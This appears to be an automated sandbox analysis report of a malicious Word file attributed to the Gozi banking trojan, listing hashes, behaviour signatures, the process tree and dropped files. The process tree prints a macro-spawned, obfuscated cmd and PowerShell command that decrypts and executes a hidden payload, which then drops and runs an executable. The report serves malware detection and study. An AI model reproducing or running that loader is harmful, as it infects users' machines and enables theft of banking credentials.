Analysis

  • max time kernel
    146s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    12-06-2024 20:47

General

  • Target

    a24a6c5affcd91920c4654d9ede6189f_JaffaCakes118.doc

  • Size

    118KB

  • MD5

    a24a6c5affcd91920c4654d9ede6189f

  • SHA1

    a18d5eb5632adbfe029b75def4a42f003246f103

  • SHA256

    65fdfc9da060d5159927338fc73c3451456d595eb42352b00958a42fb7982e18

  • SHA512

    675d4649c92ecd7d7042df3b196b508b11d2b70ddb8ca2fceb6ae619caae35f8728cab8349049da2d19a39dd902b729c15acf4e6d2942a8526f7fd3974876afc

  • SSDEEP

    3072:XiqkeTlA7wM8Wz9fvPCbdXu9zDDWsIHgvv9HnX6K:bJCzu

Score
10/10

Malware Config

Extracted

Family

gozi

Signatures

  • Gozi

    Gozi is a well-known and widely distributed banking trojan.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a24a6c5affcd91920c4654d9ede6189f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2232
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2388
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" mZazXiuOGlY FtzznfNtSwwPJqMuTWaWKlW qRXoKzpMWKKl & %C^om^S^pEc% %C^om^S^pEc% /V /c set %HOTBlciQwtvEicM%=RJOVoVRMF&&set %GBRvkdwZpR%=p&&set %ablwSoDnwA%=ow&&set %CiHSOKbswOwZcHB%=qzZmsQcJb&&set %rUhlRmvnZHTw%=!%GBRvkdwZpR%!&&set %NpwaQmzGviwXwij%=MkOOrpCNEz&&set %paFOAKMoZ%=er&&set %vYhjict%=!%ablwSoDnwA%!&&set %bBYrUjSvcSiYoJ%=s&&set %WraNmCzqAUfRhbB%=jZDtsQqSj&&set %bDtpUzDUpMr%=he&&set %WclMBrbwaNHzE%=ll&&!%rUhlRmvnZHTw%!!%vYhjict%!!%paFOAKMoZ%!!%bBYrUjSvcSiYoJ%!!%bDtpUzDUpMr%!!%WclMBrbwaNHzE%! " &((VariabLE '*MDr*').NAME[3,11,2]-JoiN'')(( [RuntIme.inTeroPsERVicES.mArshaL]::PtRTostrInGaNsi( [RUNtImE.INtEroPServiCEs.maRShAL]::sEcUREStRINGtOgloBAlaLLOcansi($('76492d1116743f0423413b16050a5345MgB8AHAAMQBxADMATABjAEYAQQAwAHAAdABqAGUAZgBXAHUAYgBFAG8AKwBnAEEAPQA9AHwANgBkADIAZQBkADAAMAA1ADMAYQA1AGYAZQAwADYAMABkAGEAOAA5ADIAMQBlADgAYQA3ADIANAAwADcAZQA5ADMAMAAzAGUAOABlADEAYgBlADAAZQAxADIAYQAwAGIAOQBhADkAZQBiAGQAYgA0ADQAMQAzAGIAMQAxADIANgAyADcANQA5ADUANAA4AGIANgA0ADIAOQAxADkAZQA5AGMANgA4ADQANQAxADkAYQBjADIAOQA2ADgAYgBmADIANwAxAGMAZQA4ADgAYQAwADQAOQBmAGIAMQA1ADAAMQA0AGIANQA1AGQAZgA4ADMAZQBlADQANQA4ADYAMwBiADcAMwBiAGUAZgA3ADAANgBmADEAYwBlADgAZQBiADYANwAxADAAZAAxADQAYQBlAGMAYwBkADYAOAAwADEANgA1ADMAZQA4ADgAYgAwADQANQBjAGEAMgAyAGYAOQBiADYAMwA0ADgAMAA4AGYAMgAxAGYAZQBhADkAZAA3ADAANwA1ADgANwA1ADEAYgA5ADUAMQBlADMANQBmAGEANwA0ADUANwA1ADEANgAwADcAZAAzADEANAAxADMAOQA3AGUANQA0AGQAMQAxADYAZQA0ADUANgBlAGYANAA0ADEAOAAwADQAYwA3ADgAOABjADIAOAA4AGYAYgAzAGMAYgA1AGUAMQA0ADkAMQAyADAAMwA1ADIAYgBkAGQANQAzADMAYQBiADMAZAAwADIAZAA2AGYANABmADEAYgBhAGMAZQA4ADcAMgA2ADkANwA5ADYAMwBjAGEAOAA0AGIAZQA4AGYAMAAyADgAYgBiADYAOQA5ADUANgA4ADQANwAzAGUAYQBhADUAZgBiADAAYQA2ADYAOAA0ADEAOABjADUAOAA1ADUAZgA4AGIAZQAwADQAZgBmAGQAMgBjADMAZAA2ADYAZQBkAGMAMAA4ADIAMwA0AGUAYgBjAGEAMAA5ADMAYgAxADEANwBkADMAMABiADMAMAA2AGMANQBkAGIAYQBlADEAYgBjAGYAZgAzADQAYgBiAGEAOQBhADEANQBkAGMAMQA1AGQAZAA5ADIAYgA1AGEAYwA2ADIAYQBhADUANgA0AGYAZgA0ADEAMwAyADcANgA5ADAAZgA2ADYAOQA0AGIAMwAxAGMAZABiADkANwBiADkAOAAyAGIAYgA4AGMAOQAzAGEAYwAxADIANwBjADIAZgAwADgAMQA5ADMAYwBhADIAZQA4AGYAMAA2AGMANgBhADUAZgAwADIAYgBiAGEANQA1AGUANQBlADAAMABiAGUANAA4ADgAYwA4ADAAOQBhADUAMgA3AGMAYgAzAGQAZAA3ADgAOAAwADAAYwBlADQAMQBiADAAZgBhAGMAYgA1ADMAMwBjADQAYQA0AGUANABkAGYAMQBhADgAMAA1ADEANwA4ADcAMgA0ADMANQBmADMANQAxADcANgBkAGQANwAxAGYAYwBjADUAMgBmAGQAMgAzAGQAZgAwAGEAOQA5ADQANAA3ADQAMQBlAGQAMwA1AGMANwBmADUAOQBmADgANwA0ADIAZAA3ADQAOABjAGYAMQA3ADYAYQBhAGYAYQA5AGQAMwBjAGMAMAA5ADYAYgA3AGUANQA2AGQAMwBmADgANgBiAGMAYgBiAGYANgAxAGUAYgBmADEAOQBiAGEAYwBhAGIANABhADcAYgA3AGUANgBhADQAYgBmADUANwA1ADgAYgA1ADIAYQBjADUAYwAwADUAZQA1ADYAZQAwAGUAMgA1ADgAYwA5ADIAYQBhADgAZgAwAGQAMwA1ADkANAA5ADQAOABhADkAMgAwADkAYgAzADkAZgA0ADUAOQBkAGUAMwA0AGIAZABiADkAZQAxAGIAMgAxADQAZABkAGEANABjAGEAOAA1ADAAOQAwADcAZAA5ADYAOAAyADUAZgA0ADQAMQA0ADMAZABlAGEAOQAyADAANQBmADIAYgBlADAAMwBlADgAZgA2AGEAMAA0ADkANQA0ADEANQA5ADYAMwBjAGQANgBlADQAMQA0ADcAZgA0ADEAMwA4ADcAOQAwADgANAAyAGQANwAxAGEAZQBmADYAZABhADcANAA5ADUANAAzADAAOQAzADcAMgAwADQAYwBhADEAZABlAGUAZAA0ADgANQA4ADkANQAyADgANwA3AGMANgAzAGUAYQA0ADkAZABlADMAMgBjADQANgAxADQAMQA4ADYAMwAyAGQANQA3ADYAOAAxADIAZQA1ADUAMAA1ADIANQAyADEAYwA4AGEANwAzADUAYwAzAGIANgA5AGMANQA0AGUAZQAzADgANQBmADAAZQAyADkAYgBmADMAOAA2ADkAZAA2ADYAMAAxADcAMAA4ADcANwA5ADEAZQAxADMANQAwADQANwBiAGYAYQA4AGEANgA3ADkAYQAyADYAOAAzADQAOQAyADIAMAAzAGEANgA3ADkAMwA1AGMAMQAyAGQAMABiADMANQBiADIAOQA3ADkANwA5AGUAOAAwAGQAZABjAGMAZgA4ADYANgBiADEAZAA4ADYANgAyADIAOQA2ADMAOAA5ADgAYQAwADQAZgAwADEAMgA5ADgAZgA5ADQAOQBkADMANgA2ADcAZABkAGYAZAA1ADYANwBjAGYAMQA4ADAANgAzAGYAMAAwAGMANQA4AGMAZAA2ADcAYgBlAGMAMwA4ADYANwBjADMAMQA1AGEANQAwADQAOQA4ADAAYQBlADcAZABmADgANQA0ADEAOAA2ADEAOQA3AGYANQA0ADIAOQA3AGMAOAA0AGUAMgBkAGYAZgA1ADEAZAAzADgANAAxADMANgA5AGUAZQAzAGYAMAA2AGEANQAxADMANABjAGMAZABhADIAMQAyADEAZAAyADkAYwBjADAANABlAGMAYwA0ADUAYgA4ADUAMwA4ADkANQA1ADUAMwAxADQAYwA1ADYAYgA0AGEAMgA2ADQAYwBjADIANAA4ADYAZAAzADAANQAyAGQAYQA0ADgANwBjADQAOQAzAGIAOABmAGEAZgA4ADIAZgAxAGMAOABiADgAMwBjADMANwAzADAAOAAzADIAOQA4ADUANwAzADMAZAA5AGEAYgBkADQANgAxADQAZAA4AGQAYgAzADIANwA3AGEAMAA0AGEANQBlADkAZgAzADUAYgAxADEAOQA4ADYAZAA2ADkAOQA2AGQANAA4AGMANgBlAGUAMgAxADUANAA1ADUAZgBlADMAZgAzADkAMQA1AGYAMgBjADgAMAA5ADEAOQBhADcAMwBmADIAYwBlAGIAYgA5ADgANwA5AGUANABkAGQAMAA0ADcAMABiADkANAAxADAAZQA5ADYAMgAyADgANQA4ADQAZABhADAAMQBjADcAYgBkADIAYwAwADgAYQBmAGEANwBmADYAMABhADUAMwAxAGEAYwA2AGQAMABmADYAZQA5ADcAMwAxADgAMAAzADAAMABmADgAYgA2ADIAYQBiADgAMgBjAGIANgBkAGYAYQA4ADcAYQA2AGYAZQAxADQAZQBkADYAMABmAGYAMwBiADAAMABmAGMAMwBkADgANwA1ADIAZAA4ADAAOQA0ADAAYwBmAGEANQBkAGQAYQBlADEAYQBkADcAMAAzADAAZAAxAGYAZQA5ADYAMwA0ADcANwBkAGYANwAyADgANwAxADgAZQA5ADgAOQBlAGQANwA3AGEAZQAwAGMAZgA3AGMAMAA0ADgAZgBhAGIAMQAxAGUANwA0ADAAMQAyAGIAMAAxAGEAZQA1ADYAOQA3ADQANQA0AGYAMwAxAGIANQBlADIAOQA0ADQANQBhAGYAMgA3ADIAZQA3ADMAZQA4ADEAOAA3ADYANgBiAGYAYgBjADEAMQBiAGIANgA1ADgANAAwADEANABmAGUAZAA4ADkANgBlADEAZQA5ADQANQBlAGMAZgA4ADgAMQAxADIANwAzADEAMQBkADcAOQA=' |conVeRtTo-SECUrEstrIng -Ke (221..236))))))
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell " &((VariabLE '*MDr*').NAME[3,11,2]-JoiN'')(( [RuntIme.inTeroPsERVicES.mArshaL]::PtRTostrInGaNsi( [RUNtImE.INtEroPServiCEs.maRShAL]::sEcUREStRINGtOgloBAlaLLOcansi($('76492d1116743f0423413b16050a5345MgB8AHAAMQBxADMATABjAEYAQQAwAHAAdABqAGUAZgBXAHUAYgBFAG8AKwBnAEEAPQA9AHwANgBkADIAZQBkADAAMAA1ADMAYQA1AGYAZQAwADYAMABkAGEAOAA5ADIAMQBlADgAYQA3ADIANAAwADcAZQA5ADMAMAAzAGUAOABlADEAYgBlADAAZQAxADIAYQAwAGIAOQBhADkAZQBiAGQAYgA0ADQAMQAzAGIAMQAxADIANgAyADcANQA5ADUANAA4AGIANgA0ADIAOQAxADkAZQA5AGMANgA4ADQANQAxADkAYQBjADIAOQA2ADgAYgBmADIANwAxAGMAZQA4ADgAYQAwADQAOQBmAGIAMQA1ADAAMQA0AGIANQA1AGQAZgA4ADMAZQBlADQANQA4ADYAMwBiADcAMwBiAGUAZgA3ADAANgBmADEAYwBlADgAZQBiADYANwAxADAAZAAxADQAYQBlAGMAYwBkADYAOAAwADEANgA1ADMAZQA4ADgAYgAwADQANQBjAGEAMgAyAGYAOQBiADYAMwA0ADgAMAA4AGYAMgAxAGYAZQBhADkAZAA3ADAANwA1ADgANwA1ADEAYgA5ADUAMQBlADMANQBmAGEANwA0ADUANwA1ADEANgAwADcAZAAzADEANAAxADMAOQA3AGUANQA0AGQAMQAxADYAZQA0ADUANgBlAGYANAA0ADEAOAAwADQAYwA3ADgAOABjADIAOAA4AGYAYgAzAGMAYgA1AGUAMQA0ADkAMQAyADAAMwA1ADIAYgBkAGQANQAzADMAYQBiADMAZAAwADIAZAA2AGYANABmADEAYgBhAGMAZQA4ADcAMgA2ADkANwA5ADYAMwBjAGEAOAA0AGIAZQA4AGYAMAAyADgAYgBiADYAOQA5ADUANgA4ADQANwAzAGUAYQBhADUAZgBiADAAYQA2ADYAOAA0ADEAOABjADUAOAA1ADUAZgA4AGIAZQAwADQAZgBmAGQAMgBjADMAZAA2ADYAZQBkAGMAMAA4ADIAMwA0AGUAYgBjAGEAMAA5ADMAYgAxADEANwBkADMAMABiADMAMAA2AGMANQBkAGIAYQBlADEAYgBjAGYAZgAzADQAYgBiAGEAOQBhADEANQBkAGMAMQA1AGQAZAA5ADIAYgA1AGEAYwA2ADIAYQBhADUANgA0AGYAZgA0ADEAMwAyADcANgA5ADAAZgA2ADYAOQA0AGIAMwAxAGMAZABiADkANwBiADkAOAAyAGIAYgA4AGMAOQAzAGEAYwAxADIANwBjADIAZgAwADgAMQA5ADMAYwBhADIAZQA4AGYAMAA2AGMANgBhADUAZgAwADIAYgBiAGEANQA1AGUANQBlADAAMABiAGUANAA4ADgAYwA4ADAAOQBhADUAMgA3AGMAYgAzAGQAZAA3ADgAOAAwADAAYwBlADQAMQBiADAAZgBhAGMAYgA1ADMAMwBjADQAYQA0AGUANABkAGYAMQBhADgAMAA1ADEANwA4ADcAMgA0ADMANQBmADMANQAxADcANgBkAGQANwAxAGYAYwBjADUAMgBmAGQAMgAzAGQAZgAwAGEAOQA5ADQANAA3ADQAMQBlAGQAMwA1AGMANwBmADUAOQBmADgANwA0ADIAZAA3ADQAOABjAGYAMQA3ADYAYQBhAGYAYQA5AGQAMwBjAGMAMAA5ADYAYgA3AGUANQA2AGQAMwBmADgANgBiAGMAYgBiAGYANgAxAGUAYgBmADEAOQBiAGEAYwBhAGIANABhADcAYgA3AGUANgBhADQAYgBmADUANwA1ADgAYgA1ADIAYQBjADUAYwAwADUAZQA1ADYAZQAwAGUAMgA1ADgAYwA5ADIAYQBhADgAZgAwAGQAMwA1ADkANAA5ADQAOABhADkAMgAwADkAYgAzADkAZgA0ADUAOQBkAGUAMwA0AGIAZABiADkAZQAxAGIAMgAxADQAZABkAGEANABjAGEAOAA1ADAAOQAwADcAZAA5ADYAOAAyADUAZgA0ADQAMQA0ADMAZABlAGEAOQAyADAANQBmADIAYgBlADAAMwBlADgAZgA2AGEAMAA0ADkANQA0ADEANQA5ADYAMwBjAGQANgBlADQAMQA0ADcAZgA0ADEAMwA4ADcAOQAwADgANAAyAGQANwAxAGEAZQBmADYAZABhADcANAA5ADUANAAzADAAOQAzADcAMgAwADQAYwBhADEAZABlAGUAZAA0ADgANQA4ADkANQAyADgANwA3AGMANgAzAGUAYQA0ADkAZABlADMAMgBjADQANgAxADQAMQA4ADYAMwAyAGQANQA3ADYAOAAxADIAZQA1ADUAMAA1ADIANQAyADEAYwA4AGEANwAzADUAYwAzAGIANgA5AGMANQA0AGUAZQAzADgANQBmADAAZQAyADkAYgBmADMAOAA2ADkAZAA2ADYAMAAxADcAMAA4ADcANwA5ADEAZQAxADMANQAwADQANwBiAGYAYQA4AGEANgA3ADkAYQAyADYAOAAzADQAOQAyADIAMAAzAGEANgA3ADkAMwA1AGMAMQAyAGQAMABiADMANQBiADIAOQA3ADkANwA5AGUAOAAwAGQAZABjAGMAZgA4ADYANgBiADEAZAA4ADYANgAyADIAOQA2ADMAOAA5ADgAYQAwADQAZgAwADEAMgA5ADgAZgA5ADQAOQBkADMANgA2ADcAZABkAGYAZAA1ADYANwBjAGYAMQA4ADAANgAzAGYAMAAwAGMANQA4AGMAZAA2ADcAYgBlAGMAMwA4ADYANwBjADMAMQA1AGEANQAwADQAOQA4ADAAYQBlADcAZABmADgANQA0ADEAOAA2ADEAOQA3AGYANQA0ADIAOQA3AGMAOAA0AGUAMgBkAGYAZgA1ADEAZAAzADgANAAxADMANgA5AGUAZQAzAGYAMAA2AGEANQAxADMANABjAGMAZABhADIAMQAyADEAZAAyADkAYwBjADAANABlAGMAYwA0ADUAYgA4ADUAMwA4ADkANQA1ADUAMwAxADQAYwA1ADYAYgA0AGEAMgA2ADQAYwBjADIANAA4ADYAZAAzADAANQAyAGQAYQA0ADgANwBjADQAOQAzAGIAOABmAGEAZgA4ADIAZgAxAGMAOABiADgAMwBjADMANwAzADAAOAAzADIAOQA4ADUANwAzADMAZAA5AGEAYgBkADQANgAxADQAZAA4AGQAYgAzADIANwA3AGEAMAA0AGEANQBlADkAZgAzADUAYgAxADEAOQA4ADYAZAA2ADkAOQA2AGQANAA4AGMANgBlAGUAMgAxADUANAA1ADUAZgBlADMAZgAzADkAMQA1AGYAMgBjADgAMAA5ADEAOQBhADcAMwBmADIAYwBlAGIAYgA5ADgANwA5AGUANABkAGQAMAA0ADcAMABiADkANAAxADAAZQA5ADYAMgAyADgANQA4ADQAZABhADAAMQBjADcAYgBkADIAYwAwADgAYQBmAGEANwBmADYAMABhADUAMwAxAGEAYwA2AGQAMABmADYAZQA5ADcAMwAxADgAMAAzADAAMABmADgAYgA2ADIAYQBiADgAMgBjAGIANgBkAGYAYQA4ADcAYQA2AGYAZQAxADQAZQBkADYAMABmAGYAMwBiADAAMABmAGMAMwBkADgANwA1ADIAZAA4ADAAOQA0ADAAYwBmAGEANQBkAGQAYQBlADEAYQBkADcAMAAzADAAZAAxAGYAZQA5ADYAMwA0ADcANwBkAGYANwAyADgANwAxADgAZQA5ADgAOQBlAGQANwA3AGEAZQAwAGMAZgA3AGMAMAA0ADgAZgBhAGIAMQAxAGUANwA0ADAAMQAyAGIAMAAxAGEAZQA1ADYAOQA3ADQANQA0AGYAMwAxAGIANQBlADIAOQA0ADQANQBhAGYAMgA3ADIAZQA3ADMAZQA4ADEAOAA3ADYANgBiAGYAYgBjADEAMQBiAGIANgA1ADgANAAwADEANABmAGUAZAA4ADkANgBlADEAZQA5ADQANQBlAGMAZgA4ADgAMQAxADIANwAzADEAMQBkADcAOQA=' |conVeRtTo-SECUrEstrIng -Ke (221..236))))))
          3⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2764
          • C:\Users\Public\159180.exe
            "C:\Users\Public\159180.exe"
            4⤵
            • Executes dropped EXE
            PID:1424

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      d3bfc52511ea424667b3fc2af695b62a

      SHA1

      81e077fd93a62379e95df3fd0124e25d523af07f

      SHA256

      f9a135a2f7495c63c5b4cfc7274ccb84a02f963aeb34162c7c7dee6fee666a42

      SHA512

      ce66a074ec4d882c0080449d69ade9e73d1ed4ae025a9742ebf3b0c28e2eb751a07eac5d9be6a6e267f349c0fedb71126168c3af3793c79a251793a78e3c0636

    • \Users\Public\159180.exe
      Filesize

      349KB

      MD5

      7e9cb8f91dd4fa7fe00aa49c933f8cb1

      SHA1

      018e47a0aa17acdb92363959dcae8eb624f972a0

      SHA256

      97427d8710dccda10a4aeb901ce56ca89e8d2300dc9bda6716e87a1218f500f2

      SHA512

      fecfac380d6381aa1f14d281281b71e23fdb87162ec3a988435bdddd5ec086230e1ce21bd6996b349c98e0ad0e8c421a28e305cee39ec57d148c7abcdc8f3ce8

    • memory/1424-56-0x0000000000400000-0x000000000045A000-memory.dmp
      Filesize

      360KB

    • memory/1424-55-0x00000000004B0000-0x00000000004F4000-memory.dmp
      Filesize

      272KB

    • memory/1424-48-0x00000000004B0000-0x00000000004F4000-memory.dmp
      Filesize

      272KB

    • memory/1424-47-0x0000000000400000-0x000000000045A000-memory.dmp
      Filesize

      360KB

    • memory/2232-27-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-7-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-28-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-26-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-22-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-19-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-20-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-17-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-16-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-15-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-14-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-12-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-8-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-0-0x000000002FCE1000-0x000000002FCE2000-memory.dmp
      Filesize

      4KB

    • memory/2232-9-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-25-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-45-0x0000000070C6D000-0x0000000070C78000-memory.dmp
      Filesize

      44KB

    • memory/2232-46-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-18-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-13-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-6-0x00000000004A0000-0x00000000005A0000-memory.dmp
      Filesize

      1024KB

    • memory/2232-2-0x0000000070C6D000-0x0000000070C78000-memory.dmp
      Filesize

      44KB

    • memory/2232-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2232-76-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2232-77-0x0000000070C6D000-0x0000000070C78000-memory.dmp
      Filesize

      44KB